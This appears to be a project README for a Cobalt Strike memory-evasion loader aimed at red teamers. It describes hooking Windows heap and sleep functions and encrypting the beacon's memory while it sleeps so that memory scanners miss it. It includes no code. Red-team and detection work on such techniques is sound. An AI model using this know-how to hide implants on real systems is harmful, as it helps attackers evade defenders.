A Cobalt Strike memory evasion loader for redteamers,Support x86/x64 stager/stagerless payload with profile(tested on windows7/10,winserver 2012)
- Hook Sleep,CreateProcessA,CreateHeap,GetProcessHeap functions before the shellcode is loaded into memory.
- Create a new heap for beacon's profile. when beacon calls GetProcessHeap or CreateHeap function,return the new heap's handle.
- When beacon calls sleep function we encrypt memories where beacon and profile are located,and when the sleep has finished we decrypt them.
- 64-bit beacon calls GetProcessHeap to get the memory for beacon's profile.
- 32-bit beacon dose not call GetProcessHeap to get the memory for beacon's profile.It uses CreateHeap to create new heap and get the memory to store beacon's profile from that heap.
This project would not have been possible without the following: